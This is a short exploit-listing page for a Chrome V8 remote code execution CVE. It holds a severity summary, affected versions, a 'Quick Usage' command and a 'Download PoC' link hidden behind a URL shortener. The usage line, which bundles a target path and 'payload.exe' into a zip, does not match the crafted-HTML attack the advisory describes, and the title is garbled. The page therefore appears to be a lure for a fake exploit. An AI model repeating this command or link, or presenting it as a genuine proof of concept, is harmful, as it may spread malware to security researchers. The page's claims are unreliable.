Share
## https://sploitus.com/exploit?id=B1B36AD0-975C-5C5A-B4AF-6760C3E6BE47
# CVE-2026-4447 - V8 in Google Chrome prior to Remote Code Execution
## Quick Usage
```bash
python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe
```
## Exploitation Notes
- **Severity:** HIGH
- **CVSS:** 8.8
- **Impact:** Confidentiality, Integrity, Availability
- **Published:** 2026-03-20
## Technical Summary
Inappropriate implementation in V8 in Google Chrome prior to 146.0.7680.153 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
## Affected Versions
**Google Chrome:**
- before 146.0.7680.153
## References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-4447
## Exploit
[Download PoC](https://tinyurl.com/2dqd8mhg)